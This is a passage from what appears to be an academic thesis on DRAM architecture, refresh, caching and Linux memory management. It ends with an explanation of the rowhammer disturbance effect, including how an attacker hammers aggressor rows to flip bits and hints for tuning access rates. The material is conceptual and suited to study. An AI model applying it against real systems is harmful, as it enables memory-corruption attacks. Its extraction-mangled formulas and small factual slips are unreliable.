permits 16 or 32 bit wide channels and in each new generation has been doubled the internal fetch size and external transfer speed.

11

LPDDR2 LPDDR3 LPDDR4 Clock frequency 400 MHz 800 MHz 16000 MHz Band Width 6.4 GB/s 12.8 GB/s 26.6 GB/s Date Rate (per pin) 333 ~ 1066 Mbps 800 ~ 2133 Mbps 400 ~ 3200 Mbps Core Voltage 1.8V/1.2V 1.8V/1.2V 1.8V/1.1V I/O Voltage 1.2V 1.2V 1.1V I/O Width x16/x32 x16/x32 2 ch x16 (total x32 per die) Prefetch 4n 8n 16n Number of Banks 4/8 8 8 /ch (total 16 per die) Burst Length 4/8/16 8 16/32/On fly Density 64Mb ~ 8Gb 4Gb ~ 32Gb 8Gb ~ 32Gb Table 2 LPDDR technical characteristics

2.3 DRAM ARCHITECTURE A modern DRAM system is organized hierarchically into channels, DIMMs, ranks, cells, and banks. Multiple memory channels, each handled by its own dedicated memory controller, are independent and can be accessed in parallel. Then, multiple DIMMs physical modules can be connected to each channel. Each of these modules is organized on ranks, typically on two ranks that corresponding to the front and the back of the physical memory. Each rank, that consists of several DRAM chips, is also partition into multiple banks. A 64-bit Wide DIMMs modules architecture is shown in Figure 3. Each rank contains 8 banks trough 8 different DRAM chips [11].

Figure 3 DIMM modules architecture example

12

DRAM chips are manufactured with different configurations ranging in capacities of 1 to 8 Gbit and in data bus widths of 4 to 16 pins (2.1.1). That is why multiple DRAM chips are commonly grouped together to provide a large capacity and a wide data-bus. Each DRAM chip consists of multiples banks (associated in groups of two (DDR), four (DDR2), eight (DDR3, DDR4)) (2.1.1) and each back contains a two-dimensional array of DRAM cells organized in rows and columns. Apart from the memory array, each bank also features a row buffer between the DRAM cells and the memory bus. Each DRAM cell consists of a capacitor and an access-transistor, shown in . The charge or discharge state on the cell corresponds to the full charge or discharge capacitor and are using to represent a binary data value. A wordline connects to all cells in the horizontal direction, connects each cell capacitor to the respective bit lines by activating all the cell transistors of the row. The bitline connects all cells in the horizontal direction and allows the row data to be transfer to the row buffer. When a row´s wordline is raised the row buffer (also calling sense-amplifier) read- out the charge of the row cells through the bitlines destroying the data in the cells, and immediately writes the charge back into the cells. Subsequently, requests address in a currently active row are served directly from this buffer. If a different row needs to be accessed, the currently active row is first closed, by lowering the rowline and then, the new row is fetched. Such a conflict leads to a significantly higher access time compared to same row requests, served directly by the row buffer, and is calling row conflict. Furthermore, circuitry in the memory arrays includes rows and columns address decoding logic to select the correct data and, internal counters to keep track of refresh cycles. In addition, DRAM chips often include additional storage for ECC (error-correction code) or parity bits, to enable detection or correction of errors in the data array. Each bank has dedicated sense amps and peripheral circuitry in a way that multiple banks can process memory requests in parallel which is essential to achieve sustained high bandwidth. Multiple DRAM chips are wired together to build a , with a wider data bus. All the device in the bank share address, commands and control signals and serve and receive the same requests. Table 3 shows the organization parameters of DDRx and LPDDRx devices as an example. Parameter DDR2 DDR3 DDR4 LPDDR3 Bank groups 1 1 2/4 1 Banks 4/8 8 8/16 8 Rows per bank 4K – 64K 4K – 64K 16K – 256K 16K – 32K Columns per row 512 – 2K 1K – 4K 1K 1K – 4K I/O bits 4/8/16 4/8/16 4/8/16 16/32 Table 3 DDrx and LPDDRx organization parameters

The smallest fix-length contiguous block of physical memory that an OS (Operating System) map on a memory page (contiguous virtual memory) is called a page frame. It is a contiguous collection of memory aligned on the page size boundary. For calculating the page size (also called row size) in a specific DRAM technology it is necessary to analyze the specific memory architecture: the number of banks that are contiguous at the rank in which is segmented the memory page and, the organization parameters for the specific DRAM.

13

The 2GB DDR3 DIMM [12] (Figure 4) is undoubtedly the most popular density choice among today’s users. It is configured as two identical ranks of eight banks each; one side of the DIMM housing those ICs that makeup Rank 1, with Rank 2 populating the opposite face of the module. The full module contains a total of 16 ICs (Integrated Circuits), eight per side. Each IC contains 8 banks of addressable memory. Each bank contains 16K pages (16384 rows/bank) and 1kB columns addresses (1024 columns addresses/row) and each column storing 8-bit word (1B column). Then, the total memory space for the IC is 128MB (16,384 [rows/bank] x 1,024 [columns addresses/row] x 1 [Byte/column address] x 8 [stacked banks]). Each Rank is 1 GB (128MBx 8 contiguous banks) then 2GB per module. Each row bank contains 1kB (1024 bits) column address of 1 B (I/O of 8 bits) which means is 1 KB. It is important to notice that each memory page (row) is segmented evenly across Bank n of each IC for the associated rank. For this reason, its memory page (row) is 8KB (1 [KB] x 8 [contiguous banks]). Then each memory page (row) is composed for 8-row banks, one from each contiguous 8 banks. It is critical for understanding the memory addressing to know the difference between the IC density that referring, for this example,eight distinct stacked banks and, the page space which we will be really working with n contiguous Banks spread across the total number of ICs per rank.

Figure 4 2GB DDR3 DIMM architecture. Figure in [12]

14

2.4 REFRESH MECHANISM ON DDR TECHNOLOGIES In order to retain the data stored in the DRAM cells, a periodic refresh operation is necessary, which incurred both performance and energy overhead. The refresh overhead on the systems has been simulated and demonstrate on [13] [14] [15]. Each refresh consumes energy provoking an energy consumption overhead. The DRAM rank/bank is unavailable while refreshed inducing performance degradation. The QoS is impacted due to the refresh operation degrades system performance by increasing the latency of memory accesses and also, limited the DRAM capacity scaling [15]. Furthermore, the refresh penalty increases significantly with increasing the dens of the device. If the number of rows to be refreshed is bigger the time occupied the bus with refresh commands is enhanced, the time with unavailable rows because their store capacitor is being recharged is raised and, the power need to keep the DRAM system refreshed is scaled up. To simplify the refresh management, each DRAM devices has an internal refresh counter that tracks the rows to be refreshed for the next refresh operation. The memory controller is responsible for issue AR (Active Refresh) commands at appropriate timings. Each DRAM cell should be refreshed or accessed at least once within its retention time. Most of the commodity DRAM devices set this RI (refresh interval) on either 32 ms or 64 ms, which depends on the operating temperature and DRAM types. Then in a RI time, the memory controller must issue enough AR commands to ensure that every row is refreshed exactly ones. The time between two AR commands is specified by tREFI. Therefore, the memory controller should issue at least 푅퐼/푡푅퐸퐹퐼 number of AR commands within a refresh window (RI) to ensure that every cell is refreshed before the retention time expire. The refresh options can be categorized based on the command granularity: rank, bank and row level. General purpose DDRx devices only have the all bank AR command at the entire rank level; all the banks in the device are unavailable when an AR command is performed. For example, a DDR3 DRAM rank device has an AI of 7.8us and a RI of 64ms, therefore refresh the rank required 8192 refresh commands that will be issued from the memory controller in a RI window [15]. Then, the number of rows refreshes on each AR command depends on the total number of rows in the DRAM. For example, if the device referred earlier have 8192 rows per bank each AR command will need to refresh just one row per bank. However, for a DDR with 65536 rows per bank, each AR command should refresh 8 rows in each bank. Then, the number of rows to be refreshed by a single AR increases with increasing the memory dense, therefore the tRFC (refresh completion time) also increases. On the other hand, LPDDRx devices have also the option of per bank AR, which is an additional finer/granularity refresh scheme. Just one bank is down when an AR is used, while other banks could still serve normal memory requests. Split the AR commands into eight separate operations scattered across the eight banks so the command is issued eight times more frequently. By scattering refresh operations from all bank auto refresh into multiple and non-overlapping per bank refresh operations, the refresh latency tRFC becomes shorter than before. This can be used to meet the deadlines of real-time applications [15]. In addition, LPDDRx devices dedicate more resources to reduce the background power. Specifically, two important techniques are used in LPDDRs: temperature compensated refresh rate guided by on-chip temperature sensors, and the

15 partial array self-refresh (PASR) option, where the controller has the ability to refresh only a certain portion of the memory [14].

Table 4 shows the tREFI and tRFC at the defaults RI values for several DRAM generations and devices sizes. The tRFC variety significantly with the size of a given DRAM architecture. DDR2 and DDR3 devices are specified to keep tREFI constant (7.8 us), but with a different tRFC period according to the device density. The DDR4 introduces the fine-granularity refresh mode that allows tREFI to be programmed because the tRFC becomes prohibitively long for high-density devices. The 2x or 4x mode will divide tREFI by 2 or 4, respectively and consequently, the number of rows refreshed for a single refresh command is also divided by 2 or 4. This turns in shorters tRFC, at the cost of increase x2 x4 the number of issue AR commands in a RI window time. Besides, the additional per bank auto refresh technique included in LPDDR3 helps to reduce the Refresh Competition Time [14]. Device tREFI (us) RI (ms) tRFC (ns) tRFC (ns) tRFC (ns) tRFC (ns) 1Gb 2Gb 4Gb 8Gb DDR2 7.8 64 127.5 197.5 327.5 DDR3 7.8 64 110 160 300 350 DDR4 1x 7.8 64 160 260 350 DDR4 2x 3.1 64 110 160 160 DDR4 4x 1.95 64 130 210 LPDDR3 3.9 32 60 90 Table 4 DRAM timings

The retention time has high sensitivity to temperature. The leakage increases with the increasing temperature increases, therefore shorten retention times are necessary. As a result, at extended temperatures (i.e., 85–95 C), DDRx devices must increase the refresh rate. This is the reason why the LPDDRx devices adjust the refresh rate according to the temperature.

2.5 DRAM MEMORY CONTROLLER The memory controller must service the DRAM request while obeying timing constraints of DRAM chips and ensure the correct operation of the DRAM. Behind will resume their tasks that play a crucial role in the rowhammer [11] [1] [16].  Translate physical address into channels, DIMMs, ranks, and banks. For a typical memory architecture, the controller does not need to deal with individual chips because all chips in one DIMM (rank) side are operated in the same way by responding to a single command. Whatever if AMD publicly documents the addressing function used by its product, typically the most part of the companies does not. Then the application cannot directly know which bank it is accessing.  Buffer and schedule request to improve performance. Resource bank, bus and channel conflict that can be produced on the parallel addressing access. The multiple banks allow concurrent DRAM access then often DRAM controller randomize the address mapping to

16

banks so that bank conflicts are less likely. Also, the conflict between different channels must be managed but is easier because of the separate data buses for each channel.  Guide the access to a specific bank on the rank by following the next three steeps issuing the corresponding commands and addresses: 1. ACTIVATE Bank, Row: command that opens the specific row of the specific bank to transfer the row data into the bank´s row buffer. 2. READ/WRITE Bank, Colum: commands that access the desired column of the specific bank from the row buffer (read or write). 3. PRECHARGE Bank: command that closes the row and prepares the bank for the next access by cleared the row buffer. The DRAM memory controller can optimize the memory performance by cleverly deciding each time the command steeps on each access or cleverly deciding when to close a row pre-emptively. The open page memory control policy keeps the recently accessed row open at the row buffer. This policy is generally used to benefice memory access latency, power consumption, and bank utilization by exploiting the temporal locality of memory access when the number of memory access is low. By contrast, the closed page policy and another more complex policies have been proposed and implemented in current processor architecture [17] [18], and is especially better on multi-core systems [19]. The closed page policy pre-emptively closes rows early than necessary to optimize the system performance since the bank is precharged and ready to open a new row before of the new access. The modern process includes huge caches and complex algorithm for spatial and temporal prefetching that decrease the probability of further access goes to the same row. Due to the notable increase at the number of memory access the new closed page policy, but also other policies which pre-emptively close rows, is being implemented to increase the performance at this new System reality.  Guarantee the DRAM timing constraints which are specific for each DRAM technology (2.2). It is the timing constraint defined between a pair of ACTIVATESs commands to the same row in the same bank. Is reference as row cycle 풕_푹푪. The speed of the processor and the bus speed of the system motherboard are the limiting factors on the speed of the RAM installed in a system.  Refreshing the DRAM by reading each row periodically to restore the charge. Within the retention time window, given by the specification of the DRAM standard, the memory controller must issue enough refresh commands to ensure that every row is refreshed exactly once. The refresh command can refresh many rows at a time but also every read to a row restore the charge of the cells to full value.

2.6 MEMORY HIERARCHY A multilevel memory hierarchy takes advantage of locality and cost-performance of memory technology to give a solution to the necessity of rising processing performance as amounts of fast

17 access memory. The principal of locality says that most programs do not access all code and data uniformly instead locality occur in time and space. Likewise, the smaller hardware can be accessed faster and, as faster is the memory bigger the cost. This led to a hierarchy organized into several levels, each one smaller, faster, and more expensive per bit that the next lower level [20]. The levels in a typical memory hierarchy in embedded, desktop, and server computer are showing in Figure 5. The memory became slower and larger, as we moving farther away from the processor.

Figure 5 Typical memory hierarchy 1

The Main Memory is used to store the data that is currently processed by the CPU. It uses a DRAM because is much faster to access than other kinds of storage, such as a hard disk drive (HDD), solid-state drive (SSD) or optical drive. The RAM is a volatile memory and each time the system is rebooting the OS and other files are reloaded into, from the Disk. Caches exploit both type of predictability: the temporal locality by remembering the contents of the recently accessed location and, spatial locality by fetching blocks of data around the recently accessed location. A cache contains then a copy of the Memory RAM. When a word is not found in the cache must be fetched from the memory and placed in the cache as shown below in Figure 6. On each fetch from memory multiple words, called a block (or line) are moved for efficiency reasons. Each cache block includes a tag to see which memory address it corresponds to. On the most popular scheme set associativity, a block is first mapped onto a set. The set is chosen by the address of the data and is composed for more that one cache position. In that case, each address can be mapped anywhere within that set. Then, finding a block consists of first mapping the block address to the set and then searching the set to find the block. The cache placement is called n- way set associative where n is the number of blocks in a set. A direct-mapped cache has just one block per set, so a block is always placed in the same location, in another hand, the fully associative cache has just one set, so a block can be placed anywhere [20]. When it is no available space in a cache, a replacement algorithm is used to decide what place at the cache will be evicted. Four of the most common cache replacement algorithm are: the Least Recently Used (LRU) algorithm that selects for replacement the item that has been least recently used by the CPU, the Fist-In-First-Out (FIFO) algorithm that replaces the item that is the

1 Copyright: E. Science, (USA), 2013.

18 longest time in cache, the Least Frequently Used (LRU) algorithm selects the item that has been least frequently used by the CPU, and, the Random algorithm that selects the item randomly.

Figure 6 Cache placement. Figure in [20]

The hierarchy must guarantee the consistency between the copy in the cache and the memory. When a memory write operation is performed, CPU first write into the cache memory during the write operation. These modifications need to be written back to main memory. There are two main strategies. The write-through scheme updates the item in the cache and writes through to update main memory too. On the contrary, in the write-back scheme the copy is made just in the cache and when the block is about to be replaced, is copied back to memory. Both strategies can use write buffer to allow the cache to proceed as soon as the data is placed in the buffer, avoiding the full latency to write the data into memory [20]. Most contemporary computers have at least 2 levels of cache. A primer L1 cache attached to the CPU and external L2 cache typically built with fast SRAM. Modern high-end embedded, desktop and server microprocessors may have as many as six types of cache (between levels and functions). Note that in this complex bus organization with shared memory and multiple caches coherency must be maintained between caches as well as cache and memory. Intel processors have 4 levels of cache. The L3 or LLC (Last Level Cache) is an inclusive cache, which means that all data in L1 and L2 cache is also present in the L3. The L3 is shared among all cores and the L4 is present in some Haswell and Broadwell CPUs, used for video memory and to hold evicted data from L3 cache. Whereas, the ARM architectures usually have just two-level cache where L2 is shared among the different cores due to space limitation on the SoC. Intel has not disclosed the cache replacement policy of their CPUs but for some architectures has been reverse-engineered [21]. On modern CPU architectures for x86, the most widespread policy is LRU or pseudo-LRU. Instead, on ARM architectures, the pseudo-random replacement policy is usually adopted because is easier to implement on hardware and is higher energy efficiency compared to other policies.

19

The mapping from physical addresses to cache slices is performed by complex addressing (H) function that takes as an input part of the physical address (Figure 7). Note that H it is undocumented, but researchers have worked toward its reverse engineering. The slice addressing in modern processors is implemented computing a complex Hash function. The Last Level Cache addressing functions for Intel architecture has been reversed engineering at the [22] [23] works. A combination of the previously appointed researches is presented at [3] in the form of a table Figure 8. The table shows the bit combination from the physical address whose output points which of the four cache slices the physical address maps.

Figure 7 Complex addressing scheme in the LLC, 64 B cache line, 4 slices and 2048 sets per slice. Figure in [22]

Figure 8 Complex addressing function. Figure in [22]

2.7 PHYSICAL RAM MANAGEMENT ON LINUX All the physical RAM is classified into frames that are allocated dynamically to a process from the Memory Management Unit [24] How the physical RAM is allocated for hardware devices, kernel code, and dynamical memory is shown in Figure 9.

20

Figure 9 Layout Memory. Figure in [25]

Linux classifies RAM into zones due to a hardware limitation in some olds architectures. The LOW memory (DMA and Normal zones) it is a memory for which logical address exists in the kernel space. On the other hand, the HIGH MEM is a not directly addressable part and for use, it will be temporally mapping into NORMAL. Note that this approach response to commercial pressure to support more memory while not breaking the 32-bit application and system compatibility. Then, even 32-bit processors can address more than 4GB of physical memory. You can see a typical memory zone distribution for an 8GB RAM system on both 32 bit and 64 bits architectures [24] in Figure 10.

Figure 10 Memory zone for 8GB RAM. Figure in [24]

The Linux system deals with several types of addresses for different situations [26]. User virtual addresses: Regular addresses seen by user-space programs. Each process has its own virtual address space and its length depends on the underlying hardware architecture (32 or 64 bits). Physical addresses: The addresses used between the processor and the system´s memory. Even the 32-bit system can use larger physical addresses sometimes.

21

Bus addresses: The addresses used between peripheral buses and memory. Often, they are the same as the physical address used by the processor. But are highly architectural dependent and some architectures can provide an I/O memory management unit (IOMMU) that remaps addresses between a bus and main memory. Kernel logical addresses: The normal address space of the kernel. Maps some portion (or all) of main memory and are often treated as if they were physical addresses. On most architectures, logical address differs only by a constant offset from their associated physical address. Kernel virtual addresses: Are mapping from a kernel-space address to a physical address. Many kernel virtual addresses are not logical addresses but all the logical are kernel virtual address. The relation between these address types, and physical high and low memory zones are showed in Figure 11 below.

Figure 11 Depicts a kernel allocation overview. Figure in [26]

An overview of the memory allocation at Linux kernel is shown in Figure 12 Allocators in the Kernel overview. Figure in Figure 12. The SLAB Allocator relies on Page Allocator and manages the allocation of low memory (Bytes) requests. The specific algorithm supports less fragmentation and less time for initializing the objects than the Buddy Allocator ones. It is used inherently by the kernel for data structures and to create caches containing objects of the same size [28]. The main kernel memory allocator is the Kmalloc Allocator that allocate a physical contiguous buffer of small size by using SLAB Allocator or big side by using Page Allocator. On the other hand, the vmalloc Allocator allocates memory only at virtual contiguous by allocated non- contiguous chunks of physical memory and maps it via page tables into contiguous chunks of virtual address space [29].

22

The principal algorithm used to manage and allocate physical pages (Page Allocator) on the Linux kernel is the Buddy Allocator that has been shown to be extremely fast in comparison to other allocators. The basic concept is quite simple. Memory is broken up into large blocks of pages. Each block in the system has an order, that is an n integer ranging from 0 to a specific upper level. The size of the order n block is 2n pages. Power-of-two block sizes make address computation simple because all buddies are aligned on memory address boundaries that are powers of two. Whenever a memory request comes, it assignee the smallest possible block (power of 2) available. If a block of the desired size is not available, the algorithm looks for the next larger block available and split into two halves (buddies). If just a larger area is available will be split into two repeatedly until achieving the desired block size [30]. When a larger block is split, it is divided into two smaller blocks, and each smaller block becomes a unique buddy to the other. A split block can only be merged with its unique buddy block, which then reforms the larger block they were split from. When an area is freed, it is checked whether is buddy is free as well, so they can get merged. The kernel attempt to merge together pairs of free buddy blocks of size b into a single block of size 2b. The algorithm is iterative, if it succeeds in merging released blocks, it doubles b and tries again to create even bigger blocks. The Page Allocator API describes specific flags that specify the action, zone, and type of memory allocation.

Figure 12 Allocators in the Kernel overview. Figure in [27]

Linux makes use of two different buddy systems: one handles the page frames suitable for ISA DMA, while the other one handles the remaining page frames.

2.8 MEMORY MANAGEMENT The modern systems provided an abstraction of main memory known as Virtual Memory (VM). The addresses seen by the user programs do not correspond directly with the physical address

23 by provided each process with a large, uniform and private address space, as is shown below in Error! Reference source not found.. In this way, the programmes running in the system are a llowing to allocate more memory than is physically available by treating efficiently the memory as a cache for address spaces stores at the disk. And, aside from simplifies memory management also protects the address space of each process from corruption by the other process. It is the base for Built-in memory protection: one process´s RAM is inaccessible and invisible to other processes and Kernel RAM is invisible to a userspace process. The CPU accesses main memory by generating a virtual address that is converted to physical before to be sent to the memory. These capabilities are provided by a combination of the operating system software, address translation hardware in the MMU (memory management unit), and a data structure stored in physical memory known as a page table that maps virtual pages to a physical page. The address translation is made by the MMU that handless transparently all memory access from LOAD/STORE instructions at RISC or from any instruction accessing memory at CISC. Maps the memory access not just using a virtual address system RAM but also using virtual address to memory-mapped peripheral hardware. It is responsible for handle the permissions and generates the page fault exception on an invalidate access too. The operating system is responsible for maintaining the contents of the page table and transferring pages back and forth between disk and DRAM. The Page Table is an array of page table entries (PTEs), one entry for each virtual page of the process (Figure 13). Each entry maps virtual pages’ numbers (VPNs) to physical pages’ numbers (PPNs) by using the VPNs as an index of the array. Each PTE include also auxiliary information about the page such as a present bit, a dirty or modified bit, address space or process ID information, amongst others. For a regular x86-32 paging a PTE is a simple 4-Bytes record as shown below in Figure 14.

Figure 13 x86 Page Table Entry (PTE). Figure in [31]

Figure 14 Virtual to Physical Mapping for x86-32bit Page Table Entry. Figure in [31]

The address translation mechanism would slow down the main memory reads performance twice since will be necessary to read the page table in addition to each access memory location. To

24 reduce this overhead is typically present a translation lookaside buffer (TLB). The TLB is an associative cache of recently used (PTE) page table entries. When a Virtual Address needs to be accessed is searched the TLB, if a match is found the physical address is returned and access directly. If a match is not found, MMU detects miss and does a regular look up the Page Table. Then, evicts one old entry out of the TLB and replaces it with the new one, so next time, the PTE for that page will be found it. An overview of the Virtual Memory is shown in Figure 15

Figure 15 Virtual Memory System scheme. Figure in [32]

One page table for each process must be placed in physical main memory which could require unacceptable space. A more manageable multi-level scheme is often used. Then every virtual address must be broken up into parts to yield offsets within these page table levels and an offset within the actual page. The n-bit virtual address has two components: a p-bit virtual page offset (VPO) and an (n-p)-bit virtual page number (VPN). The VPN is broken up into k offset that corresponds to each PTE level. The MMU used the last level VPN to select the appropriate PTE. Then, the corresponding physical address is the concatenation of the physical page number (PPN) - k from PTE and the VPO from the virtual address. The VPO is identical to the PPO because the physical and virtual page are both P bytes, map directly the offset that points the specific address inside of the physical page. An overview of the virtual to physical memory mapping is shown below in

Figure 16.

25

Figure 16 Virtual to Physical Address mapping. Figure in [32] The virtual address space is divided into pages and every Virtual Memory Area must be a multiple of the page size. Both Linux and Windows map the user portion of the virtual address space using 4KB pages. Linux has 4-level paging from 2.6.11 version onwards for both 32-bit and 64-bit architectures. For 32-bit architecture two-level paging is sufficient to support two-level paging Linux page folding mechanism. In page folding mechanism Linux simply eliminates upper and middle levels by making their sizes as zero. For 64-bit architecture, Linux uses four level paging. In a multitasking OS, a process provides each program with the illusion that it has exclusive use of the system´s address space by using its own private address space that cannot, in general, be read or written by any other process. Is relevant to note that each process can easy use discontiguous physical memory providing the illusion of contiguous at virtual address spaces. The range of virtual address depends on the computer structure set architecture and the operating system pointer size implementation which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. The contents of the memory associated with each private address space have the same general organization, is split into two logical regions: kernel memory and process memory. The kernel memory is the memory that is reserved for the OS kernel´s code, data, and stack, typically in the top part of the address space. The button remainder portion of the address space is available for the user, with the usual text, data, heap and stack segments. An example of the process address space on X86 can be shown in Figure 17. The processor provides a mechanism that restricts the instructions that an application can execute as well as the address space that it can access. A process running in user mode is not allowing to directly reference code or data in the kernel area of the address spaces. Instead must access it indirectly via the system call interfaces.

Figure 17 Process Address Space. Figure in [32]

26

2.8.1 DMA (Direct Memory Access) DMA (Direct Memory Access) is a feature inside modern microcontrollers that allows other hardware subsystems to access system memory independently of the CPU. It does not involve the system processor and can greatly increase throughput to and from a device by eliminating the computational overhead. It is the hardware mechanism on Linux Memory management that allows the peripheral components to transfer data directly to and from main memory. And allows the processor to work simultaneously on its own job while on-going operations of memory usage are carried out by externally connected devices [26]. Not all memory zones are suitable for DMA, the High memory may not work on some systems and with some devices because the peripheral cannot work with an address that high. Usually, a specified portion of memory is designated as an area to be used for direct memory access. In the ISA bus standard, up to 16 megabytes of memory can be addressed for DMA. The EISA and Micro Channel Architecture standards allow access to the full range of memory addresses (assuming they’re addressable with 32 bits). The device drivers allocate one or more special buffers suited to DMA. When these DMA buffers are bigger than one page, they must occupy contiguous pages in physical memory because the device transfer data using the ISA or PCI system bus, both of which carry physical addresses. The modules can allocate their buffers only at runtime [26]. In some simple systems, the device can do DMA directly to the physical address. But in many others, there is IOMMU hardware that translates DMA addresses to physical addresses. This is part of the reason for the DMA API: the driver can give a virtual address which sets up any required IOMMU mapping and returns the DMA physical address. The driver then tells the device to do DMA to the physical address, and the IOMMU maps it to the buffer at a virtual address in system RAM. The DMA-buf API is a generic kernel level framework to share DMA buffers across different devices and sub-systems and for synchronizing asynchronous hardware access. Defines a new buffer object which provides a mechanism for exporting and using shared buffers and provides uniform APIs that allow various operations related to buffer sharing.

27

3 DISTURBANCE MECHANISM ON DRAM AND ROWHAMMER

In the quest to get memories smaller and faster the vendors have reduced the physical geometry of DRAMs and increases density on the chip. But smaller cells can hold a lower limited amount of charge which reduces its noise margin and renders it to more vulnerable to lost data. Also, the higher cell´s proximity introduces electromagnetic coupling effects between them. And the higher variation in process technology increases the number of cells susceptible to inter-cell crosstalk. Then, new DRAM technologies are more likely to suffer from disturbance that can go beyond their merges and provoke errors. The existence and widespread nature of disturbance errors in the actual DRAM chips were exposed firstly in [1] at 2014. In this work, the root of the problem was identified in the voltage fluctuation on internal wires called wordline. Each row has its own wordline whose voltage is rising on row access. Then, many accesses to the same row force this line to be toggled on and off repeatedly provoking voltage fluctuation that induce a disturbance effect on nearby rows. The perturbed rows leak charge at an accelerated rate and if its data is not restored fast enough some of the cells changes its original value. In fact, this vulnerability is present in the majority of the recent commodity DRAM chips [1] [2]. Has been proving that repeatedly readings from the same DRAM address could corrupt data in nearby addresses. When a DRAM row is opened (ACTIVATED) and closed (PRECHARGED) again and again (hammering) it can induce disturbance error in adjacent DRAM rows. Thus, the triggering of bit flips is essentially a race against the DRAM internal active refresh, enough memory access must be performed to cause sufficient disturbance to adjacent row before the active refresh restored the data at the victim row. Then, an attacker can cause enough of disturbance in a neighbouring row (the victim row) to cause bits to flip by repeatedly access the same memory (the aggressor row) fast enough. The disturbance error is produced on DRAM row when a nearby wordline voltage is toggled repeatedly. The repeated opening/closing of rows and not on the column reads procedure are responsible for the interference. The research at Carnegie Mellon University [1] demonstrates that the specific disturbance error is a symptom of charge loss. They find out that the data lost were only in one direction, either one to zero or zero to one, never both. Due to the orientation intrinsic property of DRAM cells, some cells represent a data value of “1” using a charge state (the true-cells) while the others use the discharged state (the anti-cells). There are cases where both orientations are used in distinct parts of the same DRAM module. They prove that the true cells experience only one to zero errors and the anti-cells experience just the zero to one. The fact that the occur errors were causing by toggled immediately adjacent rows [1] together with the study of DRAM phenomenon such as [33] [34] has been used in [35] to describe the origin of rowhammer from two effects:  Word Line to Word Line Coupling (WL-WL): Changing the voltage of wordline could inject noise into an adjacency wordline through the electromagnetic coupling and partially enable it, causing leakage on its row´s cells. The coupling noise (crosstalk) between word lines increases the sub-threshold leakage current of cell transistors on adjacent rows [33].

28

The ratio of coupling noise to a stored signal voltage on a non-accessed DRAM cell of neighbouring rows increases with the smaller future size due to the WL-WL coupling.  Passing-Gate effect: Also the 3D transistors are susceptible to coupling from adjacent gates and affect a victim gate. Activating any active adjacent gate, a gate close to the victim gate using the same active area, or passing gate, a gate close to the victim that does not use the same active area, changes the electric field around the victim gate. This lowers the threshold voltage and increases the leakage current of victim cell transistors [36].

The main component of the leakage current 퐼푙푒푎푘 is the sub-threshold leakage current that can be expressed as functaion of ∆푉푡ℎ−푠푢푏.The ∆푉푡ℎ−푠푢푏 is the sub-threshold voltage variation and the n is the body-effect coefficient.

푞∆푉푡ℎ−푠푢푏/푛푘푇 퐼푙푒푎푘 ≈ 퐼푠푢푏 ∝ 푒

3.1 CHARACTERIZATION OF THE ROWHAMMER PROBLEM Three parameters characterize the successfully flip of a bit on victim rows [8]. The refresh interval (RI) determines how frequently the module is refreshed. The activation interval (AI), it is the toggled period and determines how frequency a row is toggled. The threshold number of activations (Nth) is the minimum number of activations that trigger a bit. Also, the data pattern which is the selected data on the victim and aggressor rows influence on the activation of the vulnerability. The biggest value for the refresh interval (RI) is given by the DRAM chip, it is the biggest time that the chip can guarantee keep the data without degradation. It is directly related to the retention time limit for the cells (푡푟푒푡−푡ℎ ) on the chip (at DDRx and LPDDRx technologies is typically 64ms) and selected at the Memory controller (2.2). At [1] was prove that for shortest RI (at constant AI) are a fewer error. The victim cell has less time to leak charge between refreshes and a row is opened fewer times which diminishing the disturbance effect. The capability to induce disturbance errors on specific systems depends on the AI (or toggle rate) in relation to the refresh interval. This refers to how much times a specific row is activated between refresh commands that recharge the data on each cell. It is related to the (푡푅퐶) timing constrain defined between a pair of ACTIVE commands to the same row in the same back by the Memory Controller (2.5). Generally, the more times the row is open on a refresh interval the bigger is the probability of bit flips. Then, as the activation interval (AI) is reduced augmenting the errors. A row is open more times before of the data refresh which increases the disturbance effect. Nevertheless, when the memory access rate overpasses a limit, a smaller number of bits are being flip than at the typical case [37] [2]. The memory controller could schedule refreshes and memory access commands under pressing memory accessing conditions. For example, the DDR3 DRAM standard memory controllers deprioritize the refresh command to RI of 64 us in an attempt to minimize the latency of the request under 100% utilization [1],. Then, No Operation Instructions (NOP) on each integration of the loop can help sometimes to trigger more flip bits to lower the access memory rate to the same address [2]. On the other side, at a sufficiently high

29 refresh interval, the errors could be completely eliminated but with a corresponding consequence on both power consumptions and performance [1] [2] [37] [38].

3.1.1 Mathematical Characterization of Rowhammering Threshold The Rowhammering Threshold (푹푯풕풉) is the threshold number of activation, within a refresh cycle, required to cause data loss due to rowhammering. The successful rowhammer Threshold is presented mathematical at studies such as [35] [39]:

푡푟푒푡−푅퐻 푅퐻푡ℎ = × 푀푚푎푥 푡푟푒푡−푡ℎ

Let 푡푟푒푡−푅퐻 be the time during which a cell on a victim row suffers from rowhammer, the 푡푟푒푡−푡ℎ the refresh cycle related with the retention time of the cells at the DRAM and, 푀푚푎푥 the total possible number of operations in a refresh rate.

Can also be expressed as a function of the leakage currents where 퐼푙푒푎푘−푅퐻 represents the leakage current under row hammering. It is the leakage current with guard-band (퐼푙푒푎푘−퐺퐵) increased 훼 (Hammering rate) times under . The guard-band is chosen by manufactures as a safety precaution in order to ensure cell leakage does not cause cells to lose their bit-state naturally. It is expressed as a retention time (푡푟푒푡−퐺퐵 = 훽 ∙ 푡푟푒푡−푡ℎ), a safety margin conforms to JEDEC refresh standards.

퐼푙푒푎푘−푅퐻 = 훼 ∙ 퐼푙푒푎푘−퐺퐵

The leakage current can be expressed as: 푄 퐶 ∙ 푉 퐼 = = → 퐶 ∙ 푉 = 퐼 ∙ 푡 푙푒푎푘 푡 푡 푙푒푎푘−퐺퐵

Where C is the capacitance of the cell, V is the driving voltage or how much voltage is being applied to a capacitor in order to fill it to capacitance, Q represents the total charge of a capacitor and t represent a period of time. Then, by dived the leakage contribution on two times parts and using the before equations the retention time at the guard-band can be expressed as follow:

퐼푙푒푎푘−퐺퐵 ∙ 푡푟푒푡−퐺퐵 = 퐶 ∙ 푉 = 퐼푙푒푎푘−퐺퐵 ∙ (푡푟푒푡−푡ℎ − 푡푟푒푡−푅퐻) + 퐼푙푒푎푘−푅퐻 ∙ 푡푟푒푡−푅퐻 → 푡푟푒푡−퐺퐵 = 푡푟푒푡−푡ℎ + (훼 − 1) ∙ 푡푟푒푡−푅퐻

If we express the retention time with a guard band as a function of the threshold retention time 푡푟푒푡−푅퐻 훽−1 ( = ), then the rowhammering threshold (푅퐻푡ℎ) can be expressed as: 푡푟푒푡−푡ℎ 훼−1

